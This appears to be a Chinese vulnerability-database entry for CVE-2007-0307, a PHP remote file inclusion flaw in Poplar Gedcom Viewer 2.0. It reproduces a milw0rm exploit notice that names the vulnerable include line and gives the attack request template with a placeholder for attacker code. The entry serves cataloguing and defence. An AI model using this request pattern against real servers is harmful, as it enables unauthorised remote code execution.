Poplar Gedcom Viewer 'Common.PHP' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111994 漏洞类型 输入验证
发布时间 2007-01-12 更新时间 2007-01-18
CVE编号 CVE-2007-0307 CNNVD-ID CNNVD-200701-271
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-271
|漏洞详情
PoplarGedcomViewer2.0及之前版本的include/common.php中存在PHP远程文件包含漏洞。远程攻击者可以借助env[rootPath]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
/###################################################################\
# Poplar Gedcom Viewer v2.0 final                                   #
# =========================================================         #
# Published : 2007-01-00                                            #
# Remote: Yes                                                       #
# Site:ftp://ftp1.comscripts.com/PHP/689_poplarge-20.zip            #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& THE GENERAL & Asb-May.Net      #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# In :                                                              #
# /include/common.php                                               #
# Line:                                                             #
# 51                                                                #
# Vulnerable Code:                                                  #
# include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' )   #
# 3XP|0!T :                                                         #
# /include/common.php?env[rootPath]=[EV!L-CODE]                     #
#                                                                   #
#             /#######################################\             #
#             #         Tryag.Com & Dwrat.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-12]
|参考资料

来源:BID
名称:22038
链接:http://www.securityfocus.com/bid/22038
来源:VUPEN
名称:ADV-2007-0174
链接:http://www.frsirt.com/english/advisories/2007/0174
来源:SECUNIA
名称:23761
链接:http://secunia.com/advisories/23761
来源:OSVDB
名称:32807
链接:http://osvdb.org/32807
来源:MILW0RM
名称:3121
链接:http://milw0rm.com/exploits/3121